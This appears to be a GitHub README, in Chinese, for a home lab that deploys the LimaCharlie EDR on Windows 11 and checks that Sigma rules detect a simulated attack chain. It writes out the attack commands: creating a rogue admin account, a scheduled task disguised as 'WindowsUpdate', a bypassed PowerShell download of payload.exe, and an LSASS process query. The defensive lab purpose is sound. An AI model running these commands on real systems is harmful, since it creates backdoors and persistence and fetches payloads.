gaurav-koshti-CySA/EDR-limacharlie-homelab

# EDR-limacharlie-homelab LimaCharlie EDR 部署、攻击模拟与威胁检测（Windows 11 Pro）—— 在 Wazuh + Nessus 家庭实验环境中实现完整的攻击链，涵盖发现（Discovery）、持久化（Persistence）、凭证访问（Credential Access）和命令与控制（C2），并使用 Sigma 规则进行检测。 ## 实验环境 | 虚拟机 | IP | 角色 | |---|---|---| | Kali Linux | 10.0.2.5 | Wazuh Manager 4.7.5（Indexer + Manager + Dashboard） | | Windows Server 2019 | 10.0.2.15 | Wazuh Agent + Sysmon + Nessus Essentials 扫描器 | | Windows 11 Pro | 10.0.2.122 | Wazuh Agent + Sysmon + LimaCharlie EDR Sensor | 所有虚拟机运行在 Oracle VirtualBox 的 NAT 网络 LabNetwork（10.0.2.0/24）上。 ## 什么是 LimaCharlie？ LimaCharlie 是一个云原生安全运营平台，提供实时 EDR 功能。它使分析师能够完全了解端点遥测数据，包括进程创建、网络连接、文件系统活动和注册表变更，这些数据会实时流式传输到云控制台。 ## 实验目标 - 在实时 Windows 11 Pro 端点上部署 LimaCharlie 传感器 - 启用基于 Sigma 的检测规则集（ext-sigma） - 模拟真实的多阶段攻击链 - 生成并分析映射到 MITRE ATT&CK 的检测结果 - 验证 EDR 遥测数据与现有 Wazuh SIEM 覆盖范围的结合 ## 部署 ### 步骤 1 - 创建 LimaCharlie 组织 - 在 app.limacharlie.io 注册 - 创建组织：GK-SOC-Homelab（区域：加拿大） ### 步骤 2 - 生成安装密钥 - 导航到 Sensors > Installation Keys - 创建密钥：Win11-Pro-10.0.2.122 ### 步骤 3 - 在 Windows 11 Pro 上安装传感器 cd C:\Users\admin\Downloads hcp_win_x64.exe -i ### 步骤 4 - 验证部署 确认 win11-endpoint 在 60 秒内以绿色 Online 状态出现在 LimaCharlie Sensors List 中。 ### 步骤 5 - 启用检测规则 - 订阅 ext-sigma：Core Sigma 规则（MITRE ATT&CK 映射，免费） ## 攻击模拟与检测 ### 阶段 1 - 发现（Discovery） whoami /all & net user & net localgroup administrators | 检测规则 | MITRE ATT&CK 技术 | |---|---| | 可疑的组和账户侦察活动（使用 Net.EXE） | T1069 | | 本地账户发现 | T1087.001 | | 使用 Whoami.EXE 枚举所有信息 | T1033 | ### 阶段 2 - 持久化（Persistence） net user hacker P@ssword123 /add & net localgroup administrators hacker /add schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c whoami" /sc onlogon /ru system | 检测规则 | MITRE ATT&CK 技术 | |---|---| | 通过 Net.EXE 创建新用户 | T1136.001 | | 用户被添加到本地管理员组 | T1098 | | 通过 Schtasks.EXE 创建计划任务 | T1053.005 | | 使用高权限的可疑 Schtasks 计划类型 | T1053.005 | ### 阶段 3 - 命令与控制（Command and Control） powershell -ExecutionPolicy Bypass -NoProfile -Command "Invoke-WebRequest -Uri http://example.com -OutFile C:\Temp\payload.exe" | 检测规则 | MITRE ATT&CK 技术 | |---|---| | 00048-WIN-Powershell_Invoke-WebRequest_Usage | T1105 | | Web 请求命令和 cmdlet 的使用 | T1105 | | 将 PowerShell 策略更改为不安全级别 | T1059.001 | | 可疑的 Invoke-WebRequest 执行 | T1105 | | 派生的非交互式 PowerShell 进程 | T1059.001 | ### 阶段 4 - 凭证访问（Credential Access） powershell -nop -exec bypass -c "Get-Process lsass" | 检测规则 | MITRE ATT&CK 技术 | |---|---| | PowerShell Get-Process LSASS | T1003.001 | | 可疑的 PowerShell 参数子字符串 | T1059.001 | | 派生的非交互式 PowerShell 进程 | T1059.001 | ## MITRE ATT&CK 覆盖范围摘要 | 战术 | 技术 | ID | |---|---|---| | Discovery | 账户发现：本地账户 | T1087.001 | | Discovery | 系统所有者/用户发现 | T1033 | | Discovery | 权限组发现 | T1069 | | Persistence | 创建账户：本地账户 | T1136.001 | | Persistence | 账户操作 | T1098 | | Persistence | 计划任务/作业 | T1053.005 | | Command and Control | 入口工具传输 | T1105 | | Execution | PowerShell | T1059.001 | | Credential Access | 操作系统凭证转储：LSASS 内存 | T1003.001 | ## 清理 net user hacker /delete & schtasks /delete /tn "WindowsUpdate" /f ## 关键要点 - LimaCharlie 配合 Sigma 规则成功检测到模拟的所有 4 个 MITRE 战术的攻击技术 - EDR 遥测数据提供了 SIEM 日志收集无法捕获的进程级细节 - 免费 ext-sigma 规则集提供了企业级检测覆盖，零成本 - 在同一端点上同时运行 EDR 和 Wazuh SIEM 展示了真实的多工具 SOC 可视化能力 ## 相关实验 - [Wazuh SIEM 实验环境](https://github.com/gaurav-koshti-CySA/Wazuh_SIEM_Lab) - [Nessus 漏洞管理实验环境](https://github.com/gaurav-koshti-CySA/Nessus_Vuln_Management_Lab) - [事件响应实验环境](https://github.com/gaurav-koshti-CySA/-Incident-Response-lab) - [Entra IAM 实验环境](https://github.com/gaurav-koshti-CySA/Entra_Iam_Lab)

标签：AMSI绕过, Cloudflare, EDR, HTTP工具, IP 地址批量处理, LimaCharlie, MITRE ATT&CK, Nessus, PE 加载器, Sigma规则, Sysmon, Wazuh, Windows 11, 威胁情报, 威胁检测, 安全运营, 家庭实验室, 开发者工具, 扫描框架, 攻击模拟, 数据展示, 无线安全, 目标导入, 端点安全, 红队, 网络安全审计, 网络攻防, 脆弱性评估, 补丁管理, 速率限制, 驱动签名利用